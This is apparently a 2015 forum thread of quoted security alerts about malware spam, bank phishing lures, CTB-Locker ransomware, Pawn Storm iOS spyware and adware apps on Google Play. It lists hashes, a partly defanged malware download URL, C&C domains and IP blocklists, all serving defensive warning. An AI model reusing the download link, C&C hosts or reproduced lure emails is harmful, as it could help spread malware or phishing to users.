Feb 02 2015 - "A TROJAN that has spread itself by posting links to a pornographic video has affected over 110,000 Facebook users in just 48 hours. The malware spreads from the account of previously infected users of the social network, tagging around 20 of their friends. If someone opens the link contained in the post, they will get a preview of a porn video which eventually stops and asks for a fake Flash player to be downloaded which contains the malware. The malware was uncovered by a security researcher called Mohammad Reza Faghan, who posted information about it on security mailing list archive Seclists.org*... the Trojan is different from previous examples seen on Facebook, which sent messages on behalf of the victim to a number of the victim's friends. Upon infection of those friends, the malware could go one step further and infect the friends of the initial friends. In the new technique, however, the malware has more visibility to the potential victims as it tags the friends of the victim in the malicious post. The malware is thought to be able to hijack keyboard and mouse movements if executed successfully once landing on a victim's machine."
* http://seclists.org/fulldisclosure/2015/Jan/131
___

Fake Chrome update Spam drops CTB Locker/Critroni Ransomware
- https://blog.malwarebytes.org/social-engineering/2015/02/google-chrome-update-spam-drops-ctb-lockercritroni-ransomware/
Feb 2, 2015 - "Beware of emails appearing to come from Google warning you that “Your version of Google Chrome is potentially vulnerable and out of date”. In this latest spam wave, cyber crooks are tricking users into downloading the well-known browser, except that it’s a dangerous Trojan that will encrypt your personal files and demand a hefty ransom to decrypt them back:
> https://blog.malwarebytes.org/wp-content/uploads/2015/02/spam.png
The payload is not attached to the email but instead gets downloaded from various websites that appear to have been compromised... Running “ChromeSetup.exe” will not install Google Chrome. Instead the Windows wallpaper will change to this:
> https://blog.malwarebytes.org/wp-content/uploads/2015/02/encrypted1.png
This is not just a fake warning. The files on the systems are -indeed- encrypted:
> https://blog.malwarebytes.org/wp-content/uploads/2015/02/encrypted4.png
The bad guys demand a ransom that can be paid using Bitcoins:
> https://blog.malwarebytes.org/wp-content/uploads/2015/02/encrypted8.png
... The problem with ransomware is that while the active Trojans can be removed, it is much more difficult and sometimes impossible to recover the encrypted files. The folks at BleepingComputer* have some tips on how to restore your encrypted files. However, as is often the case, prevention is critical to avoid a nasty ransomware infection..."
* http://www.bleepingcomputer.com/virus-removal/ctb-locker-ransomware-information#shadow

- http://net-security.org/malware_news.php?id=2952
03.02.2015
> http://www.net-security.org/images/articles/chrome-mal-03022015.jpg

:fear::fear: :mad:

AplusWebMaster
2015-02-03, 14:46
FYI...

Fake 'CIT' SPAM – doc malware
- http://myonlinesecurity.co.uk/cit-inv-15000375-po-sp14161-word-doc-malware/
3 Feb 2015 - "'CIT Inv# 15000375 for PO# SP14161' pretending to come from Circor <_CIG-EDI@ CIRCOR .COM> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/CIT-Inv-15000375-for-PO-SP14161.png

3 February 2015: FOPRT01.DOC - Current Virus total detections: 1/57*
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/476eaa256c7a17e93e18312bc00049f9a838097bbdab8b8a56d581e3948dca23/analysis/1422951071/

- http://blog.dynamoo.com/2015/02/malware-spam-circor-cig-edicircorcom.html
3 Feb 2015
"... Recommended blocklist:
143.107.17.183
92.63.88.108 "
___

Fake 'Barclays Your Debit Card' – Phish ...
- http://myonlinesecurity.co.uk/barclays-debit-card-notification-phishing/
3 Feb 2015 - "'Your Debit Card Notification' pretending to come from Barclays Bank Plc is one of the latest phish attempts to steal your Barclays Bank, debit card and personal details. This one only wants your Barclays log in details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well... The website at gardendecore .pl have cleaned up the phishing pages and hopefully plugged the security holes or vulnerabilities that let the bad guys get in in the first place. If you follow the link you see a webpage looking like the genuine Barclays log in page:

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Barclays_phish_-feb_2015.png

When you fill in the required details there, the phishers then send you on to the next page where they ask you to fill in your name, details and passcodes, the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
___

Fake 'Garrett' SPAM - malware
- http://myonlinesecurity.co.uk/pulsar-instruments-plc-garrett-courtright-copy-07441489933-malware/
3 Feb 2015 - "'Garrett Courtright Copy from +07441489933' pretending to come from Garrett Courtright <ophidian@ nagsgolf .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Fax: +07441489933
Date: 2015/01/18 16:43:04 CST
Pages: 1
Reference number: Y67969682C281D
Filename: pulsar_instruments_plc57.zip
Pulsar Instruments Plc
Garrett Courtright

3 February 2015 : pulsar_instruments_plc57.zip: Extracts to: pulsar_instruments_plc57.scr
Current Virus total detections: 7/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c02902664a73255408adc93bb1b0b8075759eacbf16dbb9a88c96343f46818b3/analysis/1422985036/
... Behavioural information
TCP connections
213.186.33.2: https://www.virustotal.com/en/ip-address/213.186.33.2/information/
5.178.43.10: https://www.virustotal.com/en/ip-address/5.178.43.10/information/
___

Fake 'Halifax' SPAM – Phish ...
- http://myonlinesecurity.co.uk/update-account-details-halifax-phishing/
3 Feb 2015 - "'Update your account details' pretending to come from Halifax Online Banking <securitynews@halifax.co.uk> is one of the latest phish attempts to steal your Bank, credit card and personal details. An alternative email says 'We’re improving your Halifax account' also pretending to come from Halifax Online Banking <securitynews@ halifax .co .uk>. This one wants all your personal details including email address and password and your credit card and bank details. Many of them are also designed to specifically steal your facebook and other social network log in details as well... don’t -ever- open or fill in the html (webpage) form that comes attached to the email... If you do it will lead you to a website that looks at first glance like the genuine bank website but you can clearly see in the address bar, that it is -fake-. Some versions of this phish will ask you to follow a link in the body of the email to a phishing site. Both of today’s emails have different phish sites in the attached html files but otherwise the attachments are identical.

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/halifax_phish_email_2.png
-or-
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/halifax_phish_email_1.png

If you open the attached html file you see a webpage looking like this (split in 2 to get it all):
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/halifax1-1024x587.png

> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/halifax21-1024x620.png

... these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."

:fear: :mad:

AplusWebMaster
2015-02-04, 19:27
FYI...

Fake 'USPS Delivery' SPAM – doc malware
- http://myonlinesecurity.co.uk/usps-delivery-notification-word-doc-malware/
4 Feb 2015 - "'USPS Delivery Notification' pretending to come from USPS <no-reply@ usps .gov> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/USPS-Delivery-Notification-1024x614.png

4 February 2015: label_54633541.doc - Current Virus total detections: 2/55*
... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email..."
* https://www.virustotal.com/en/file/5ac0c18b4743626c3c49492cd7470c1b4060c553705bb49612a5d1b2be0c2fb5/analysis/1423064590/
___

Pawn Storm Update: -iOS- Espionage App Found
- http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-update-ios-espionage-app-found/
Feb 4, 2015 - "... spyware specifically designed for espionage on -iOS- devices. While spyware targeting -Apple- users is highly notable by itself, this particular spyware is also involved in a targeted attack... Operation Pawn Storm is an active economic and political cyber-espionage operation that targets a wide range of entities, like the military, governments, defense industries, and the media. The actors of Pawn Storm tend to first move a lot of pawns in the hopes they come close to their actual, high profile targets. When they finally successfully infect a high profile target, they might decide to move their next pawn forward: advanced espionage malware... The iOS malware we found is among those advanced malware. We believe the iOS malware gets installed on already compromised systems, and it is very similar to next stage SEDNIT malware we have found for Microsoft Windows’ systems... The obvious goal of the SEDNIT-related spyware is to steal personal data, record audio, make screenshots, and send them to a remote command-and-control (C&C) server. As of this publishing, the C&C server contacted by the iOS malware is -live- ...
C&C Communication: Besides collecting information from the iOS device, the app sends the information out via HTTP. It uses POST request to send messages, and GET request to receive commands... The exact methods of installing these malware is unknown. However, we do know that the iOS device doesn’t have to be jailbroken per se. We have seen one instance wherein a lure involving XAgent simply says “Tap Here to Install the Application.” The app uses Apple’s ad hoc provisioning, which is a standard distribution method of Apple for iOS App developers. Through ad hoc provisioning, the malware can be installed simply by clicking-on-a-link, such as in the picture below:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/01/pwnstrm10.png
There may be other methods of infection that are used to install this particular malware. One possible scenario is infecting an iPhone* after connecting it to a compromised -or- infected Windows laptop via a USB cable...
* http://blog.trendmicro.com/trendlabs-security-intelligence/the-other-side-of-masque-attacks-data-encryption-not-found-in-ios-apps/
The hashes of the related files are:
05298a48e4ca6d9778b32259c8ae74527be33815
176e92e7cfc0e57be83e901c36ba17b255ba0b1b
30e4decd68808cb607c2aba4aa69fb5fdb598c64 ..."

- http://arstechnica.com/security/2015/02/spyware-aimed-at-western-governments-journalists-hits-ios-devices/
Feb 4 2015
___

Apps on Google Play Pose As Games - Infect Millions with Adware
- https://blog.avast.com/2015/02/03/apps-on-google-play-pose-as-games-and-infect-millions-of-users-with-adware/
Feb 3, 2015 - "A couple of days ago, a user posted a comment on our forum* regarding apps harboring adware that can be found on Google Play. This didn’t seem like anything spectacular at the beginning, but once I took a closer look it turned out that this malware was a bit bigger than I initially thought. First of all, the apps are on Google Play, meaning that they have a huge target audience – in English speaking and other language regions as well. Second, the apps were already downloaded by millions of users and third, I was surprised that the adware lead to some legitimate companies:
> https://blog.avast.com/wp-content/uploads/2015/02/Durak-game-GP.png
The Durak card game app was the most widespread of the malicious apps with 5–10 million installations according to Google Play:
> https://blog.avast.com/wp-content/uploads/2015/02/Durak-1-player-2-player-rules-300x168.png
When you install Durak, it seems to be a completely normal and well working gaming app. This was the same for the other apps, which included an IQ test and a history app. This impression remains until you reboot your device and wait for a couple of days. After a week, you might start to feel there is something wrong with your device. Some of the apps wait up to 30 days until they show their true colors. After 30 days, I guess not many people would know which app is causing abnormal behavior on their phone, right? Each time you unlock your device an ad is presented to you, warning you about a problem, e.g. that your device is infected, out of date or full of porn. This, of course, is a complete lie. You are then asked to take action, however, if you approve you get re-directed to harmful threats on fake pages, like dubious app stores and apps that attempt to send premium SMS behind your back or to apps that simply collect too much of your data for comfort while offering you no additional value.
> https://blog.avast.com/wp-content/uploads/2015/02/Threats-detected-malcious-apps-300x261.jpg
An even bigger surprise was that users were sometimes directed to security apps on Google Play. These security apps are, of course, harmless, but would security providers really want to promote their apps via adware? Even if you install the security apps, the undesirable ads popping up on your phone don‘t stop. This kind of threat can be considered good social engineering. Most people won‘t be able to find the source of the problem and will face fake ads each time they unlock their device. I believe that most people will trust that there is a problem that can be solved with one of the apps advertised “solutions” and will follow the recommended steps, which may lead to an investment into unwanted apps from -untrusted- sources... the apps’ descriptions should make users -skeptical- about the legitimacy of the apps. Both in English and in other languages such as German, were written poorly: “A card game called ‘Durak‘ – one of the most common and well known game“. The apps‘ secure hash algorithm (SHA256) is the following:
BDFBF9DE49E71331FFDFD04839B2B0810802F8C8BB9BE93B5A7E370958762836 9502DFC2D14C962CF1A1A9CDF01BD56416E60DAFC088BC54C177096D033410ED FCF88C8268A7AC97BF10C323EB2828E2025FEEA13CDC6554770E7591CDED462D "

* https://forum.avast.com/?topic=165003.0
___

Data Integrity: The Core of Security
- http://www.securityweek.com/data-integrity-core-security
Feb 4, 2015 - "... Companies spend huge sums of money every year to maintain a security perimeter designed to fend off cyber and insider threats. According to Gartner*, worldwide spending on information security will reach $71.1 billion in 2014, an increase of 7.9 percent over 2013. Total information security spending will grow a further 8.2 percent in 2015 to reach $76.9 billion. Other Gartner figures show that in 2013, average budget allocations for information security were 5.1% of the overall IT budget, up 8.5% from 2012. However, the majority of investments are aimed at bolstering traditional perimeter security defenses, which is a losing battle... if we can prevent data from leaving the organization or being modified, protecting against network breaches becomes less critical. Unfortunately, data is often left unsecured... When it comes to information security, 100 percent protection in unattainable. However, by supplementing traditional perimeter defense mechanisms with data integrity principals, organizations can significantly reduce their exposure to Sony scale data breaches."
* http://www.gartner.com/newsroom/id/2828722
___

YouTube dumps Flash for HTML5
- http://www.infoworld.com/article/2877283/web-development/youtube-dumps-flash-for-html5.html
Jan 30, 2015 - "In a blow to proprietary rich Internet plug-ins, YouTube, which had been a stalwart supporter of Adobe’s Flash plug-in technology, revealed this week that it now -defaults- to the HTML5 <video> tag. The move shows HTML5's continued march toward Web dominance... Late Apple founder Steve Jobs probably did the most to the further the decline by refusing to support Flash on the company’s wildly popular iOS handheld devices. In fact, Flash shows a downward trajectory on W3Techs' report* on the number of websites using Adobe’s multimedia platform. It has -dropped- to 11.9 percent this month versus more than 15 percent a year ago. The numbers are far worse for Microsoft’s late-arriving Flash rival, Silverlight..."
* http://w3techs.com/technologies/details/cp-flash/all/all

:fear: :spider:

AplusWebMaster
2015-02-05, 18:45
FYI...

Fake HSBC SPAM - PDF malware
- http://myonlinesecurity.co.uk/hsbc-payment-advice-fake-pdf-malware/
5 Feb 2015 - "'HSBC Payment Advice' pretending to come from HSBC <no-replay@ hsbci .co .uk> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Sir/Madam
Upon your request, attached please find payment e-Advice for your
reference.
Yours faithfully
HSBC
We maintain strict security standards and procedures to prevent
unauthorised access to information about you. HSBC will never contact
you by e-mail or otherwise to ask you to validate personal information
such as your user ID, password, or account numbers. If you receive such
a request, please call our Direct Financial Services hotline.
Please do not reply to this e-mail. Should you wish to contact us,
please send your e-mail to commercialbanking@ hsbc .co .uk and we will
respond to you.
Note: it is important that you do not provide your account or credit
card numbers, or convey any confidential information or banking
instructions, in your reply mail.
Copyright. The Hongkong and Shanghai Banking Corporation Limited 2005.
All rights reserved...

5 February 2015: HSBC-69695.zip: Extracts to: CashPro.exe
Current Virus total detections: 4/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/1f89e7f265686922f62acb94d4dd193197190574c953fbcf81ec729c72dadd35/analysis/1423139205/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
93.157.100.56: https://www.virustotal.com/en/ip-address/93.157.100.56/information/
178.47.141.100: https://www.virustotal.com/en/ip-address/178.47.141.100/information/
___

Fake FedEx SPAM - malicious script
- http://blog.dynamoo.com/2015/02/malware-spam-unable-to-deliver-your.html
5 Feb 2015 - "This -fake- FedEx spam has a malicious script attached.
From: FedEx 2Day A.M.
Date: 5 February 2015 at 15:01
Subject: PETRO, Unable to deliver your item, #0000220741
Dear Petro,
We could not deliver your item.
You can review complete details of your order in the find attached.
Yours sincerely,
Marion Bacon,
Delivery Manager.
(C) 2014 FedEx. The content of this message is protected by copyright and trademark laws.

Attached is a file FedEx_0000220741.zip which contains a malicious javascript which is highly obfuscated... but it is a bit clearer when deobfuscated... This script has a moderate detection rate of 9/56*, and downloads a file from:
http ://freesmsmantra .com/document.php?id=5451565E140110160B0824140110160B08000D160107104A070B09&rnd=3252631
Which is saved as %TEMP%\11827407.exe. This has a low detection rate of 3/56**. Automated analysis tools... don't give much of a clue as it has been hardened against analysis."
* https://www.virustotal.com/en/file/7284754c52f850158c541e00b28ab7ae1516c8161738da11c64bd5b259b48e12/analysis/1423149508/

** https://www.virustotal.com/en/file/cfa3dccd88c033117bccee4e01958b20253bfb562d82a73fa6ab65874abd66db/analysis/1423148815/

50.31.134.98: https://www.virustotal.com/en/ip-address/50.31.134.98/information/
___

Fake Barclays SPAM – Phish ...
- http://myonlinesecurity.co.uk/new-barclays-service-important-notice-phishing/
5 Feb 2015 - "'New Barclays Service Important Notice' pretending to come from Barclays Service [mailto:secure@ barclaysalertid .com] is one of the latest phish attempts to steal your Barclays Bank details. We have been seeing a quite large increase in Barclays phishing emails over the last week or so. Today’s version is particularly well done with a domain that will fool a lot of people...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/barclaycard_phishing-email_1.png

If you follow-the-link, you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Barclays_phish1.png
You then get:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Barclays_phish_check.png
Then you get this page which tries to convince you that various African IP addresses have accessed your account and scare you into going further:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Barclays_phish2.png
You then get the processing/checking screen again before being sent on to:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Barclays_phish3-1024x646.png
Where they ask you to fill in your name, details and passcodes, the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and format. And then once again to the processing/checking screen before you are sent on to the final page where they say they will send you a new pinsentry device by post:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Barclays_phish4-1024x603.png
All of these emails use Social engineering tricks to persuade you to open-the-attachments that come with the email..."

:fear: :mad:

AplusWebMaster
2015-02-06, 14:56
FYI...

Something evil on 5.196.143.0/28 and 5.196.141.24/29 ...
- http://blog.dynamoo.com/2015/02/something-evil-on-5196143028-and.html
6 Feb 2015 - "... interesting blog post from Cyphort* got me digging into that part of the infection chain using nonsense .eu domains. It uncovered a whole series of IPs and domains that have been used to spread Cryptowall (possibly other malware too), hosted in the 5.196.143.0/28 and 5.196.141.24/29 ranges (and possibly more). These are OVH IP ranges, suballocated to a customer called Verelox .com. I think that Verelox is a legitimate but very small web host that has suffered a major compromise of their servers. The first range is 5.196.141.24/29 which has apparently compromised servers at:
5.196.141.24, 5.196.141.25, 5.196.141.26, 5.196.141.27
... The second range is 5.196.143.0/28 with apparently -compromised- servers at:
5.196.143.3, 5.196.143.4, 5.196.143.5, 5.196.143.6, 5.196.143.7, 5.196.143.8, 5.196.143.10, 5.196.143.11,
5.196.143.12, 5.196.143.13
In addition to this, some of these domains use nameservers on the following IP addresses:
168.235.70.106
168.235.69.219
These are allocated to Ramnode LLC in the US. I would suggest that they are under the control of the bad guys and are worth -blocking- traffic to.
Note that Cyphort identify these C&C servers for the malware:
asthalproperties .com:4444
pratikconsultancy .com:8080
The following IPs and domain names all seem to be connected and I would recommend -blocking- at least the IP addresses and domains... other domains look like they are probably throwaway ones:
5.196.143.0/28
5.196.141.24/29
168.235.69.219
168.235.70.106
asthalproperties .com
pratikconsultancy .com ..."
(More detail at the dynamoo URL at the top of this post.)

* http://www.cyphort.com/gopego-malvertising-cryptowall/
___

Fake 'CashPro Online' SPAM – PDF malware
- http://myonlinesecurity.co.uk/cashpro-online-digital-certificate-fake-pdf-malware/
6 Feb 2015 - "'Your CashPro Online Digital Certificate' pretending to come from CashPro Online <no-replay@ cashpro .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Dear CashPro Customer,
This email is being sent to inform you that you have been granted a new
digital certificate for use with Bank of America CashPro Online.
Please open the attachment and you will be guided through a simple
process to install your new digital certificate.
If you have any questions or concerns, please contact the Bank of
America technical help desk.
Thank you for your business,
Bank of America
CashPro Online Security Team
Please do not reply to this email .
Copyright 2015 Bank of America Merrill Lynch. All rights reserved.
CashPro is a registered trademark of Bank of America Corporation.

6 February 2015: docs-20276.zip: Extracts to: docs.exe
Current Virus total detections: 3/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/5387585bc905f6304b190493af158a714bdd0baed1be7e81db40407d4a92af01/analysis/1423239330/
... Behavioural information
TCP connections
91.198.22.70: https://www.virustotal.com/en/ip-address/91.198.22.70/information/
178.47.141.100: https://www.virustotal.com/en/ip-address/178.47.141.100/information/
192.185.35.92: https://www.virustotal.com/en/ip-address/192.185.35.92/information/
71.18.62.202: https://www.virustotal.com/en/ip-address/71.18.62.202/information/
UDP communications
77.72.174.163: https://www.virustotal.com/en/ip-address/77.72.174.163/information/

- http://threattrack.tumblr.com/post/110256192178/bank-of-america-cashpro-spam
Feb 6, 2014
docs.exe (1D38C362198AD67329FDF58B4743165E)
Tagged: bank of america, cashpro, Upatre

:fear::fear: :mad:

AplusWebMaster
2015-02-09, 17:59
FYI...

Fake 'Lloyds new message' SPAM – PDF malware
- http://myonlinesecurity.co.uk/lloyds-new-message-fake-pdf-malware/
9 Feb 2015 - "'You have a new message pretending to come from Lloyds Commercial Banking <GrpLloydslinkHelpdesk@ lloydsbanking .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Lloyds Commercial Logo
We want you to recognise a fraudulent email if you receive one. Lloyds Bank will always greet you personally using your title and surname and, where you hold an existing account with us, the last four digits of your account number: XXXX1328.
Dear Lloyds Link Customer,
You have a new message
There’s a new message for you, messages contain information about your account, so it’s important to view them.
If you’ve chosen to use a shared email address, please note that anyone who has access to your email account will be able to view your messages.
Please check attached message for more details.
Subject
Date
Account details
Account number
Important information about your account
09 Feb 2015
Lloyds Commercial
XXXX1328
Please note: this message is important and needs your immediate attention. Please check attached file straightaway to view it.
Yours sincerely
Signature image of Nicholas Williams - Consumer Digital Director
Nicholas Williams,
Consumer Digital Director
Please do not reply to this email as this address is not manned and cannot receive any replies.
Lloyds Bank plc. Registered Office: 25 Gresham Street, London EC2V 7HN. Registered in England and Wales, number 2065. Telephone: 020 7626 1500.
Lloyds Bank plc is authorised by the Prudential Regulation Authority and regulated by the Financial Conduct Authority and the Prudential Regulation Authority under registration number 119278.

9 February 2015: ImportantMessage.zip: Extracts to: ImportantMessage.scr
Current Virus total detections: 6/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/a1baf36ebbc6ba4091f4c44e3b730fc376be6064884e1c50ee9a6e9ab4d6becd/analysis/1423485253/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
94.41.208.125: https://www.virustotal.com/en/ip-address/94.41.208.125/information/
198.23.48.157: https://www.virustotal.com/en/ip-address/198.23.48.157/information/
UDP communications
77.72.174.165: https://www.virustotal.com/en/ip-address/77.72.174.165/information/
77.72.174.164: https://www.virustotal.com/en/ip-address/77.72.174.164/information/
___

Fake 'Lloyds new debit' SPAM - PDF malware
- http://myonlinesecurity.co.uk/lloyds-received-new-debit-fake-pdf-malware/
9 Feb 2014 - "'You have received a new debit' pretending to come from Payments Admin <paymentsadmin@ lloydstsb .co .uk> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Monday 09 February 2014
This is an automatically generated email by the Lloyds TSB PLC
LloydsLink online payments Service to inform you that you have receive a
NEW Payment.
The details of the payment are attached.
This e-mail (including any attachments) is private and confidential and
may contain privileged material. If you have received this e-mail in
error, please notify the sender and delete it (including any
attachments) immediately. You must not copy, distribute, disclose or use
any of the information in it or any attachments.

9 February 2015 : details#00390702.zip: Extracts to: details.exe
Current Virus total detections: 6/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/f7412fe1b3fa064fe1897d20be1e39e0a7cba3d25a081f23dd69d03a98dd34ca/analysis/1423485121/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
94.41.208.125: https://www.virustotal.com/en/ip-address/94.41.208.125/information/
91.103.216.71: https://www.virustotal.com/en/ip-address/91.103.216.71/information/
UDP communications
77.72.174.167: https://www.virustotal.com/en/ip-address/77.72.174.167/information/
77.72.174.166: https://www.virustotal.com/en/ip-address/77.72.174.166/information/

:fear: :mad:

AplusWebMaster
2015-02-10, 15:59
FYI...

Fake 'Amazon Order' SPAM – malware
- http://myonlinesecurity.co.uk/amazon-order-details-malware/
10 Feb 2015 - "'Amazon Order Details' pretending to come from Amazon.com > <delivers@ amazon .com> with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This one is a lazy attempt to spread the malware using an old email from last year saying Order R:121216 Placed on June 28, 2014...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Amazon-Order-Details-1024x422.png

Todays Date: order_report.zip: Extracts to: order_report_238974983274928374892374982.exe
Current Virus total detections: 2/57* ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/5fc22d2913d37ee645965909c55c33b669a78f86688187b1a20c94f87076b0ef/analysis/1423571463/
___

Fake 'Purchase Order' SPAM - malware
- http://blog.dynamoo.com/2015/02/malware-spam-megtrade-groups.html
10 Feb 2015 - "This spam comes with a malicious attachment:
From: Megtrade groups [venkianch@ gmail .com]
Reply-To: venkanch@ gmail .com
Date: 10 February 2015 at 15:47
Subject: RE: Purchase Order Copy
Hello Vendor,
I just got back from business trip, Please find attached our purchasing order let us know price so as to confirm sample with your company.
You give us your payment terms but note our company payment policy 30% prepayment after confirming proforma invoice from you and the balance against copy of B/L.
Kindly treat as urgent and send invoice, I await to have your urgent reply to proceed.
Thanks & Best regards,
Mr Venkianch
Managing Director
NZ Megtrade Groups Ltd ... Download Attachment As zip

Unusually, this email does -not- appear to be sent out by a botnet but has been sent through -Gmail-. The link in the email goes www .ebayonline .com .ng/download/ohafi/jfred/Purchase%20Order%20Copy_pdf.7z where it downloads a file Purchase Order Copy_pdf.7z which (if you have 7-Zip installed) uncompresses to the trickily-named:
(1) Purchase Order Copy.pdf ___________________
(2) Delivery Time and Packing.pdf _______________________ _____ Adobe Reader.pdf
... or in .exe
As you might expect, this is malicious in nature and has a VirusTotal detection rate of 34/57*. The Malwr analysis** indicates that this installs a -keylogger- among other things."
* https://www.virustotal.com/en/file/0f24103be25179ed2d97c273ece36744612a81b57833c7d6f79d3b83b88f6761/analysis/1423585487/

** https://malwr.com/analysis/NmFjMWRhZWQyYjVmNDNlNjlmY2ZmMzdkMDRmYTM2NzI/

:fear: :mad:

AplusWebMaster
2015-02-11, 15:23
FYI...

Fake 'e-invoice' SPAM
- http://blog.dynamoo.com/2015/02/malware-spam-your-latest-e-invoice-from.html
11 Feb 2015 - "This -fake- invoice spam has a malicious attachment:
From: Lydia Oneal
Date: 11 February 2015 at 09:14
Subject: Your latest e-invoice from HSBC HLDGS
Dear Valued Customer,
Please find attached your latest invoice that has been posted to your online account. You’ll be pleased to know that your normal payment terms still apply as detailed on your invoice.
Rest assured, we operate a secure system, so we can confirm that the invoice DOC originates from HSBC HLDGS and is authenticated with a digital signature.
Thank you for using e-invoicing with HSBC HLDGS - the smarter, faster, greener way of processing invoices.
This message and any attachment are confidential and may be privileged or otherwise protected from disclosure.
If you are not the intended recipient, please telephone or email the sender and delete this message and any attachment from your system.
If you are not the intended recipient you must not copy this message or attachment or disclose the contents to any other person.

The company name and the name of the sender varies, but most of the body text remains identical. Some sample subjects are:
Your latest e-invoice from HSBC HLDGS
Your latest e-invoice from MAVEN INCOME & GROWTH VCT 3 PLC
Your latest e-invoice from DDD GROUP PLC
Your latest e-invoice from BAILLIE GIFFORD SHIN NIPPON
Your latest e-invoice from ACAL
Your latest e-invoice from PARAGON DIAMONDS LTD
Your latest e-invoice from TULLETT PREBON PLC
Your latest e-invoice from MERSEY DOCKS & HARBOUR CO
Your latest e-invoice from HOLDERS TECHNOLOGY
Your latest e-invoice from LED INTL HLDGS LTD
Your latest e-invoice from HALOS
Your latest e-invoice from ACORN INCOME FUND
The word document is randomly-named, for example 256IFV.doc, 19093WZ.doc and 097DVN.doc. There are three different versions of this malicious document, all with low detection rates [1] [2] [3] containing a slightly different macro in each case... The malware probably drops a Dridex DLL, although I have not been able to obtain this.
Recommended blocklist:
85.143.166.72
92.63.88.97
205.185.119.159
78.129.153.18
5.14.26.146
136.243.237.222
185.48.56.62
95.163.121.216 "
1] https://www.virustotal.com/en/file/049f8f402af29fcb09cd552b03eb23ee678428634920a2acd7096e646054d598/analysis/1423650591/

2] https://www.virustotal.com/en/file/60ad4099e56ed5a8fddb63395b0e0032726b5aaf47a71d590dddf147b433a976/analysis/1423650604/

3] https://www.virustotal.com/en/file/fdb34b9f8e3d6ee1098db6dfc800ff6a221ec10896536ad3ec3b4d31da77dc65/analysis/1423650615/


- http://myonlinesecurity.co.uk/latest-e-invoice-word-doc-malware/
11 Feb 2015
